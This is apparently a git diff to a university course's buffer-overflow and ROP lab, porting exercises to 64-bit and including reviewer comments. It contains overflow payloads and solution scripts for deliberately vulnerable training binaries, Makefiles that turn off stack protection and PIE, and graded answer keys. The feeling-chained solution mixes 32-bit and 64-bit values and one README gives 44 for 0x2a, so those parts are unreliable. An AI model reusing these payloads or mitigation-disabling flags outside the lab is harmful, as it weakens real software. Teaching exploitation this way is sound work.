diff --git a/labs/lab-12/media/rop-anatomy.svg b/labs/lab-12/media/rop-anatomy.svg
index 746ce0484..7512b0268 100644
--- a/labs/lab-12/media/rop-anatomy.svg
+++ b/labs/lab-12/media/rop-anatomy.svg
@@ -1,4 +1,4 @@
-
-
-
+
+
+
\ No newline at end of file
diff --git a/labs/lab-12/tasks/feeling-chained/solution/Makefile b/labs/lab-12/tasks/feeling-chained/solution/Makefile
index a83f61ab1..93f3ab7f7 100644
--- a/labs/lab-12/tasks/feeling-chained/solution/Makefile
+++ b/labs/lab-12/tasks/feeling-chained/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = buff-ovf3
OBJ = buff-ovf3.o
@@ -8,10 +8,10 @@ OBJ = buff-ovf3.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
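Review bot: `-z execstack` is a link-time option, but it sits in `CFLAGS` while the `$(TARGET)` link line here uses only `$(LDFLAGS)` (`-no-pie -m64`), so as far as these hunks show it never reaches the link of `buff-ovf3`; only the one-step `obfuscator`/`deobfuscator` recipes get it. This lab is about return-address overwrites and ROP, so it probably does not need an executable stack; I would drop the flag and keep NX on, `CFLAGS = -g -m64 -fno-PIC -fno-stack-protector`, and add a comment such as `# mitigations disabled on purpose for a training binary; do not reuse these flags`. The two recipes also repeat `-m64 -fno-stack-protector -z execstack -no-pie` literally instead of using `$(CFLAGS) $(LDFLAGS)`, which is why this commit had to edit several lines in every file. The same flag placement and duplication appear in the Makefiles of hidden-in-plain-sight-1, hidden-in-plain-sight-2, indirect-business, look-at-him-go, playing-god and rip-my-buffers-off.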
diff --git a/labs/lab-12/tasks/feeling-chained/solution/exploit.sh b/labs/lab-12/tasks/feeling-chained/solution/exploit.sh
old mode 100755
new mode 100644
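Review bot: Dropping the executable bit (100755 → 100644) on `exploit.sh` and on the `tests/*.sh` scripts looks unintended and is likely to break the checker. The indirect-business test scripts deleted in this same commit run `$EXPLOIT | $BINARY` and `bash -c ./run_all_tests.sh`, so they execute these files directly; the feeling-chained, rip-my-buffers-off and rop tests are not shown here, but they carry the same file names. If the mode change came from a checkout on a filesystem that does not preserve permissions, restore it with `git update-index --chmod=+x <file>` before merging, or have the tests call `bash "$EXPLOIT"` explicitly.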
diff --git a/labs/lab-12/tasks/feeling-chained/solution/solve.sh b/labs/lab-12/tasks/feeling-chained/solution/solve.sh
index 0538bba2a..b57f15d44 100755
--- a/labs/lab-12/tasks/feeling-chained/solution/solve.sh
+++ b/labs/lab-12/tasks/feeling-chained/solution/solve.sh
@@ -1,7 +1,10 @@
#!/bin/bash
# SPDX-License-Identifier: BSD-3-Clause
-python3 -c 'import sys; sys.stdout.buffer.write(b"A"*22 + b"\x56\x93\x04\x08"
+python3 -c 'import sys; sys.stdout.buffer.write(b"A"*18 + b"\x96\x11\x40\x00"
+ b"\x00\x93\x04\x08"
+ b"\x38\x00\x00\x00"
+ b"\x0d\x00\x00\x00")' | ../support/buff-ovf3
+
+
+run < <(python3 -c 'import sys; sys.stdout.buffer.write(b"\x00"*18 + b"\x3c\x13\x40\x00\x00\x00\x00\x00" + b"\x00"*2000)')
\ No newline at end of file
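Review bot: The added last line, `run < <(python3 -c ...)`, is a GDB command pasted into a bash script; `run` is not a shell command, so the script will end with a "command not found" error after the pipeline above it. It should be removed, which also restores the missing trailing newline. Separately, only the first payload line was updated: the new 4-byte value `\x96\x11\x40\x00` is followed by continuation lines that appear unchanged and still hold the 32-bit value `\x00\x93\x04\x08` and 4-byte stack arguments. That does not look consistent with the `-m64` build, so the solution should be re-checked against the committed `buff-ovf3` before merging.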
diff --git a/labs/lab-12/tasks/feeling-chained/support/buff-ovf3 b/labs/lab-12/tasks/feeling-chained/support/buff-ovf3
index cad0d8c48..01782392f 100755
Binary files a/labs/lab-12/tasks/feeling-chained/support/buff-ovf3 and b/labs/lab-12/tasks/feeling-chained/support/buff-ovf3 differ
diff --git a/labs/lab-12/tasks/feeling-chained/support/exploit.sh b/labs/lab-12/tasks/feeling-chained/support/exploit.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/feeling-chained/tests/graded_test.inc.sh b/labs/lab-12/tasks/feeling-chained/tests/graded_test.inc.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/feeling-chained/tests/run_all_tests.sh b/labs/lab-12/tasks/feeling-chained/tests/run_all_tests.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/feeling-chained/tests/tests.sh b/labs/lab-12/tasks/feeling-chained/tests/tests.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/Makefile b/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/Makefile
index 684cc8d6e..6d7dcfcbc 100644
--- a/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/Makefile
+++ b/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/Makefile
@@ -1,16 +1,16 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = main
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
link: $(SRC_DIR)/link.c
$(CC) $(CFLAGS) -c -o $@ $<
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/README.md b/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/README.md
index 188977ed1..8b79d98ac 100644
--- a/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/README.md
+++ b/labs/lab-12/tasks/hidden-in-plain-sight-1/solution/README.md
@@ -10,7 +10,17 @@ This is a clear indicator that we have to find a way to call it ourselves.
We define a `get_flag()` function prototype as void (you may be able to skip this step, but there will be an implicit declaration error during compilation) and we call it in our main function.
We then compile and assemble the file:
-`gcc -g -m32 -fno-PIC -c main.c`
+`gcc -g -m64 -fno-PIC -c main.c`
+
+This command compiles `main.c` into an object file `main.o` without position-independent code (PIC): -fno-PIC.
+The `-g` flag is used to include debugging information, and `-m64` specifies that we are compiling for a 64-bit architecture.
+The `-c` flag tells the compiler to compile the source file into an object file without linking it.
We then link it to the `link` binary:
-`gcc -no-pie -m32 link main.o -o a.out`
+`gcc -no-pie -m64 link main.o -o a.out`
+
+This command links the `link` binary with our object file `main.o` to create an executable named `a.out`.
+The `-no-pie` flag is used to disable position-independent executables, and `-m64` specifies that we are linking for a 64-bit architecture.
+
+Finally, we run the executable:
+`./a.out`
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-1/support/link b/labs/lab-12/tasks/hidden-in-plain-sight-1/support/link
index c0b67f507..12937cf89 100755
Binary files a/labs/lab-12/tasks/hidden-in-plain-sight-1/support/link and b/labs/lab-12/tasks/hidden-in-plain-sight-1/support/link differ
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/Makefile b/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/Makefile
index 57211dc1a..44d616045 100644
--- a/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/Makefile
+++ b/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/Makefile
@@ -1,16 +1,16 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = main
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
link2: $(SRC_DIR)/link.c
$(CC) $(CFLAGS) -c -o $@ $<
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/README.md b/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/README.md
index 0a00ccb16..873638fd6 100644
--- a/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/README.md
+++ b/labs/lab-12/tasks/hidden-in-plain-sight-2/solution/README.md
@@ -10,26 +10,17 @@ In a nature similar to that of the previous exercise, we take a close look at th
```asm
0000012b :
(...)
-137: 83 7d 08 2a cmp dword ptr [ebp + 8], 42
-13b: 75 0d jne 0x14a
-13d: 80 7d f4 58 cmp byte ptr [ebp - 12], 88
-141: 75 07 jne 0x14a
-143: e8 b8 fe ff ff call 0x0
+149: 83 7d fc 2a cmp DWORD PTR [rbp-0x4],0x2a
+14d: 75 0d jne 15c
+14f: 80 7d f8 58 cmp BYTE PTR [rbp-0x8],0x58
+153: 75 07 jne 15c
+155: e8 a6 fe ff ff call 0
```
-The first `cmp` instruction at `0x137` compares the value at `[ebp + 8]` with `42`.
-This implies that the first argument passed to the helper() function is expected to be `42`.
-The second `cmp` instruction at `0x13d` compares the value at `[ebp - 12]` with `88`.
-Since it's comparing a single byte (`byte ptr`), we can infer that this corresponds to a `char` argument.
-Although it appears to be a local variable, if we look around a bit, we will notice why that is:
-
-```asm
-131: 8b 45 0c mov eax, dword ptr [ebp + 12]
-134: 88 45 f4 mov byte ptr [ebp - 12], al
-```
-
-The value at `[ebp + 12]` is moved into the `eax` register - this corresponds to the second argument passed to the `helper` function.
-The lower byte of `eax`, `al`, the `char` that we are interested in, is then moved into a local variable.
+The first 'cmp' instruction at '0x149' compares the value at '[rbp - 0x4]' with '0x2a'.
+This implies that the first argument passed to the helper() function is expected to be '0x2a'.
+The second 'cmp' instruction at '0x14f' compares the value at '[rbp - 0x8]' with '0x58'.
+Since it's comparing a single byte ('byte ptr'), we can infer that this corresponds to a 'char' argument.
If both of the aforementioned comparisons are successful, the `get_flag()` function is called.
Hence, we can infer that we need to call the `helper()` function using the two arguments above - the integer `44`, and the char `X`, which is `88` in decimal.
diff --git a/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2 b/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2
index 519474896..8cd6a1229 100755
Binary files a/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2 and b/labs/lab-12/tasks/hidden-in-plain-sight-2/support/link2 differ
diff --git a/labs/lab-12/tasks/indirect-business/README.md b/labs/lab-12/tasks/indirect-business/README.md
index d412c0513..2069f8e8e 100644
--- a/labs/lab-12/tasks/indirect-business/README.md
+++ b/labs/lab-12/tasks/indirect-business/README.md
@@ -12,19 +12,3 @@ Use the input to alter the data in your favor.
If you experience a neural buffer overflow, take a look at the [relevant lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%2011%20-%20Buffer%20Management.%20Buffer%20Overflow/) and at [online examples](https://medium.com/@0x-Singularity/exploit-tutorial-understanding-buffer-overflows-d017108edc85).
If that still doesn't work, keep in mind that the great cybersecurity expert named Sun Tzu was a big proponent of bruteforce attacks.
-
-## Checker
-
-To test the implementation, enter the `tests/` directory and run:
-
-```console
-make check
-```
-
-In case of a correct solution, you will get an output such as:
-
-```text
-test_payload ........................ passed ... 100
-
-Total: 100/100
-```
diff --git a/labs/lab-12/tasks/indirect-business/solution/Makefile b/labs/lab-12/tasks/indirect-business/solution/Makefile
index 5a06169a6..6da647f54 100644
--- a/labs/lab-12/tasks/indirect-business/solution/Makefile
+++ b/labs/lab-12/tasks/indirect-business/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = buff-ovf
OBJ = buff-ovf.o
@@ -8,10 +8,10 @@ OBJ = buff-ovf.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
diff --git a/labs/lab-12/tasks/indirect-business/solution/README.md b/labs/lab-12/tasks/indirect-business/solution/README.md
index 5bdfca3e9..eb5c3485e 100644
--- a/labs/lab-12/tasks/indirect-business/solution/README.md
+++ b/labs/lab-12/tasks/indirect-business/solution/README.md
@@ -8,6 +8,16 @@ parent: 'Task: Indirect Business'
Use the buffer overflow to overwrite a string on the stack.
This is going to be copied to a global variable that is checked before calling the `get_flag()` function.
+Check the code from ./buff-ovf with GDB:
+```
+ char local_buff[10];
+ char message[10];
+
+ fgets(message, 20, stdin);
+ strcpy(buff, local_buff);
+```
+By analysing the code we can see that string "message" is 10 bytes long, but we are reading 20 bytes from stdin. By overflowing the buffer we can overwrite the "local_buff" variable with a string.
+
```sh
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*10 + b"Bye")' | ./buff-ovf
```
diff --git a/labs/lab-12/tasks/indirect-business/solution/exploit.sh b/labs/lab-12/tasks/indirect-business/solution/exploit.sh
deleted file mode 100755
index 61019235f..000000000
--- a/labs/lab-12/tasks/indirect-business/solution/exploit.sh
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-
-# TODO set the right string
-
-payload="AAAAAAAAAABye"
-
-# Print payload for redirect
-
-echo -ne "$payload"
diff --git a/labs/lab-12/tasks/indirect-business/solution/solve.sh b/labs/lab-12/tasks/indirect-business/solution/solve.sh
index 9567020aa..e81642d69 100755
--- a/labs/lab-12/tasks/indirect-business/solution/solve.sh
+++ b/labs/lab-12/tasks/indirect-business/solution/solve.sh
@@ -1,3 +1,2 @@
#!/bin/bash
-
python3 -c 'import sys; sys.stdout.buffer.write(b"A"*10 + b"Bye")' | ./buff-ovf
diff --git a/labs/lab-12/tasks/indirect-business/support/buff-ovf b/labs/lab-12/tasks/indirect-business/support/buff-ovf
index 7f37ef92a..cc94ca7b4 100755
Binary files a/labs/lab-12/tasks/indirect-business/support/buff-ovf and b/labs/lab-12/tasks/indirect-business/support/buff-ovf differ
diff --git a/labs/lab-12/tasks/indirect-business/support/exploit.sh b/labs/lab-12/tasks/indirect-business/support/exploit.sh
deleted file mode 100755
index 74c5b76d2..000000000
--- a/labs/lab-12/tasks/indirect-business/support/exploit.sh
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-
-# TODO set the right string
-
-payload=""
-
-# Print payload for redirect
-
-echo -ne "$payload"
diff --git a/labs/lab-12/tasks/indirect-business/tests/Makefile b/labs/lab-12/tasks/indirect-business/tests/Makefile
deleted file mode 100644
index c5bd8770c..000000000
--- a/labs/lab-12/tasks/indirect-business/tests/Makefile
+++ /dev/null
@@ -1,7 +0,0 @@
-SRC_PATH ?= ../support
-FULL_SRC_PATH = $(realpath $(SRC_PATH))
-
-.PHONY: check
-
-check:
- SRC_PATH=$(FULL_SRC_PATH) bash -c ./run_all_tests.sh
diff --git a/labs/lab-12/tasks/indirect-business/tests/graded_test.inc.sh b/labs/lab-12/tasks/indirect-business/tests/graded_test.inc.sh
deleted file mode 100755
index 165a40715..000000000
--- a/labs/lab-12/tasks/indirect-business/tests/graded_test.inc.sh
+++ /dev/null
@@ -1,42 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-#
-# Print test result. Printed message should fit in 72 characters.
-#
-# Print format is:
-#
-# description ...................... passed ... NNN
-# description ...................... failed ... NNN
-# 32 chars 24 chars 6 3 3
-#
-
-print_test()
-{
- func="$1"
- result="$2"
- points="$3"
-
- if test "$points" -gt 999; then
- points=999
- fi
-
- printf "%-32s " "${func:0:31}"
- printf "........................"
- if test "$result" -eq 0; then
- printf " passed ... %3d\n" "$points"
- else
- printf " failed ... 0\n"
- fi
-}
-
-run_test()
-{
- func="$1"
- points="$2"
- # Run in subshell.
- (eval "$func")
- out=$?
- print_test "$func" "$out" "$points"
- return $out
-}
diff --git a/labs/lab-12/tasks/indirect-business/tests/run_all_tests.sh b/labs/lab-12/tasks/indirect-business/tests/run_all_tests.sh
deleted file mode 100755
index c8380cd95..000000000
--- a/labs/lab-12/tasks/indirect-business/tests/run_all_tests.sh
+++ /dev/null
@@ -1,21 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-if test -z "$SRC_PATH"; then
- SRC_PATH=../support/
-fi
-
-export SRC_PATH
-echo ""
-(
- bash tests.sh
-) | tee results.txt
-echo ""
-echo "========================================================================"
-total=$(grep '\( passed \| failed \)' results.txt | rev | cut -d ' ' -f 1 | rev | paste -s -d'+' | bc)
-echo ""
-echo -n "Total: "
-echo -n " "
-LC_ALL=C printf "%3d/100\n" "$total"
-
-rm results.txt
diff --git a/labs/lab-12/tasks/indirect-business/tests/tests.sh b/labs/lab-12/tasks/indirect-business/tests/tests.sh
deleted file mode 100755
index 375e492fc..000000000
--- a/labs/lab-12/tasks/indirect-business/tests/tests.sh
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/bin/bash
-# SPDX-License-Identifier: BSD-3-Clause
-
-# shellcheck disable=SC1091
-source ./graded_test.inc.sh
-
-if test -z "$SRC_PATH"; then
- SRC_PATH=../support
-fi
-
-EXPLOIT="$SRC_PATH/exploit.sh"
-BINARY="$SRC_PATH/buff-ovf"
-
-test_payload()
-{
- flag="HSI_{well_well_well,...}"
-
- output=$($EXPLOIT | $BINARY | grep "HSI")
-
- echo
-
- if [[ "$output" == "$flag" ]]; then
- res=0
- else
- res=1
- fi
-
- return $res
-}
-
-run_test test_payload 100
diff --git a/labs/lab-12/tasks/look-at-him-go/README.md b/labs/lab-12/tasks/look-at-him-go/README.md
index 0a15f9af2..d85ef8047 100644
--- a/labs/lab-12/tasks/look-at-him-go/README.md
+++ b/labs/lab-12/tasks/look-at-him-go/README.md
@@ -10,4 +10,4 @@ The `look-at-him-go/support/dynamic` binary is executable this time and its sole
No tricks here.
> **TIP:** GDB is your friend.
-If you're unable to progress in this exercise, reference [the GDB lab](https://cs-pub-ro.github.io/hardware-software-interface/Lab%202%20-%20Memory%20Operations.%20Introduction%20to%20GDB/Introduction%20to%20GDB/Reading/) and [this](https://stackoverflow.com/questions/5429137/how-to-print-register-values-in-gdb).
+If you're unable to progress in this exercise, reference [the GDB lab](https://cs-pub-ro.github.io/hardware-software-interface/labs/lab-02/reading/introduction-to-GDB.html) and [this](https://stackoverflow.com/questions/13282176/using-gdb-to-check-registers-values/13282633).
diff --git a/labs/lab-12/tasks/look-at-him-go/solution/.gdb_history b/labs/lab-12/tasks/look-at-him-go/solution/.gdb_history
new file mode 100644
index 000000000..929a28dc2
--- /dev/null
+++ b/labs/lab-12/tasks/look-at-him-go/solution/.gdb_history
@@ -0,0 +1,9 @@
+lay n
+b main
+run
+n
+lay n
+tui disable
+run
+n
+q
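Review bot: `.gdb_history` is a per-user debugger history file and looks like it was committed by accident; it records a local session (`lay n`, `b main`, `run`, …) rather than anything the solution needs. I would remove it from the commit and add `.gdb_history` to the repository's `.gitignore`. The same commit also adds `labs/lab-12/tasks/playing-god/solution/dynamic2` as a new binary with the same blob id as `support/dynamic2` (`c53f08112`), which looks like another stray build artifact.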
diff --git a/labs/lab-12/tasks/look-at-him-go/solution/Makefile b/labs/lab-12/tasks/look-at-him-go/solution/Makefile
index 0cbf47ab9..204e661f3 100644
--- a/labs/lab-12/tasks/look-at-him-go/solution/Makefile
+++ b/labs/lab-12/tasks/look-at-him-go/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = dynamic
OBJ = dynamic.o
@@ -8,10 +8,10 @@ OBJ = dynamic.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
diff --git a/labs/lab-12/tasks/look-at-him-go/solution/README.md b/labs/lab-12/tasks/look-at-him-go/solution/README.md
index 2fedd6691..802296b30 100644
--- a/labs/lab-12/tasks/look-at-him-go/solution/README.md
+++ b/labs/lab-12/tasks/look-at-him-go/solution/README.md
@@ -8,17 +8,15 @@ parent: 'Task: Hook at Him Go'
Run the executable with GDB, ideally with `gef`, `pwndbg`, or `peda`.
As you step through, you will notice that the flag will appear in fragments in the display of the register contents (the flag string contains null characters placed specifically so that it would not be displayed all at once).
-```asm
-$eax : 0x0804d625 → "_out,"
-$ebx : 0x0804d22e → "_out,"
-$ecx : 0x0804d62a → 0x00000000
-$edx : 0x0804d625 → "_out,"
-```
+You may also see fragments in the memory dump, at times.
-You may also see fragments in the memory dump, at times:
+To step through the code, you can use the following commands:
-```asm
-0xffffd4b8│+0x0008: 0xf7fb9000 → 0x001ead6c
-0xffffd4bc│+0x000c: 0x0804d600 → 0x00000000
-0xffffd4c0│+0x0010: 0x0804d210 → 0x00495348 ("HSI"?)
+```gdb
+ni # Step to the next instruction
+n # Step to the next line of code
+b *0x or or # Set a breakpoint at a specific address
+c # Continue execution until the next breakpoint
```
+
+Observe the registers and memory as you step through the code, and you will see the flag being constructed in parts.
diff --git a/labs/lab-12/tasks/look-at-him-go/support/dynamic b/labs/lab-12/tasks/look-at-him-go/support/dynamic
index f36e23a0c..cf6827ad2 100755
Binary files a/labs/lab-12/tasks/look-at-him-go/support/dynamic and b/labs/lab-12/tasks/look-at-him-go/support/dynamic differ
diff --git a/labs/lab-12/tasks/playing-god/solution/Makefile b/labs/lab-12/tasks/playing-god/solution/Makefile
index 2d39ad34a..732cf6854 100644
--- a/labs/lab-12/tasks/playing-god/solution/Makefile
+++ b/labs/lab-12/tasks/playing-god/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = dynamic2
OBJ = vuln.o
@@ -8,10 +8,10 @@ OBJ = vuln.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
diff --git a/labs/lab-12/tasks/playing-god/solution/dynamic2 b/labs/lab-12/tasks/playing-god/solution/dynamic2
new file mode 100644
index 000000000..c53f08112
Binary files /dev/null and b/labs/lab-12/tasks/playing-god/solution/dynamic2 differ
diff --git a/labs/lab-12/tasks/playing-god/support/dynamic2 b/labs/lab-12/tasks/playing-god/support/dynamic2
index c727249aa..c53f08112 100755
Binary files a/labs/lab-12/tasks/playing-god/support/dynamic2 and b/labs/lab-12/tasks/playing-god/support/dynamic2 differ
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile b/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile
index ce9f68c0d..9484d5d56 100644
--- a/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile
+++ b/labs/lab-12/tasks/rip-my-buffers-off/solution/Makefile
@@ -1,6 +1,6 @@
CC = gcc
-CFLAGS = -g -m32 -z execstack -fno-PIC -fno-stack-protector
-LDFLAGS = -no-pie -m32
+CFLAGS = -g -m64 -z execstack -fno-PIC -fno-stack-protector
+LDFLAGS = -no-pie -m64
SRC_DIR = .
TARGET = buff-ovf2
OBJ = buff-ovf2.o
@@ -8,10 +8,10 @@ OBJ = buff-ovf2.o
all: $(TARGET)
obfuscator: $(SRC_DIR)/obfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
deobfuscator: $(SRC_DIR)/deobfuscator.c
- $(CC) -o $@ $< -m32 -fno-stack-protector -z execstack -no-pie -Wall
+ $(CC) -o $@ $< -m64 -fno-stack-protector -z execstack -no-pie -Wall
$(TARGET): $(OBJ)
$(CC) $(LDFLAGS) $(OBJ) -o $(TARGET)
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh b/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh
old mode 100755
new mode 100644
index fb26faf4c..5afa5b509
--- a/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh
+++ b/labs/lab-12/tasks/rip-my-buffers-off/solution/exploit.sh
@@ -3,8 +3,9 @@
# TODO set the correct padding length and values of addresses and stack variables
-padding_length="41"
-address="\xd6\x91\x04\x08"
+padding_length="56"
+# 64-bit little-endian address of win() (0x4011f6)
+address="\xf6\x11\x40\x00\x00\x00\x00\x00"
# build the payload
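Review bot: `padding_length="56"` has no comment saying what it measures, while the address line now has one; both values are valid only for the exact `support/buff-ovf2` binary committed alongside, and a rebuild with a different toolchain can move either. I would add a comment above it along the lines of `# offset into the input for the committed buff-ovf2 build; re-derive after any rebuild`, worded to match what the value actually counts, and say in the address comment how the symbol address was read (for example with `nm`). The same two constants are repeated in `solution/solve.sh`, so the two files can drift apart. The rest of the script lies outside this hunk.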
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh b/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh
index 9aa0bef95..95daf9b81 100755
--- a/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh
+++ b/labs/lab-12/tasks/rip-my-buffers-off/solution/solve.sh
@@ -1,3 +1,3 @@
#!/bin/bash
-python3 -c 'import sys; sys.stdout.buffer.write(b"A"*41 + b"\xd6\x91\x04\x08")' | ../support/buff-ovf2
+python3 -c 'import sys; sys.stdout.buffer.write(b"A"*56 + b"\xf6\x11\x40\x00\x00\x00\x00\x00")' | ../support/buff-ovf2
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2 b/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2
index eb708ec0e..de3899633 100755
Binary files a/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2 and b/labs/lab-12/tasks/rip-my-buffers-off/support/buff-ovf2 differ
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/support/exploit.sh b/labs/lab-12/tasks/rip-my-buffers-off/support/exploit.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/tests/graded_test.inc.sh b/labs/lab-12/tasks/rip-my-buffers-off/tests/graded_test.inc.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/tests/run_all_tests.sh b/labs/lab-12/tasks/rip-my-buffers-off/tests/run_all_tests.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rip-my-buffers-off/tests/tests.sh b/labs/lab-12/tasks/rip-my-buffers-off/tests/tests.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/solution/exploit.sh b/labs/lab-12/tasks/rop/solution/exploit.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/support/exploit.sh b/labs/lab-12/tasks/rop/support/exploit.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/tests/graded_test.inc.sh b/labs/lab-12/tasks/rop/tests/graded_test.inc.sh
old mode 100755
new mode 100644
diff --git a/labs/lab-12/tasks/rop/tests/run_all_tests.sh b/labs/lab-12/tasks/rop/tests/run_all_tests.sh
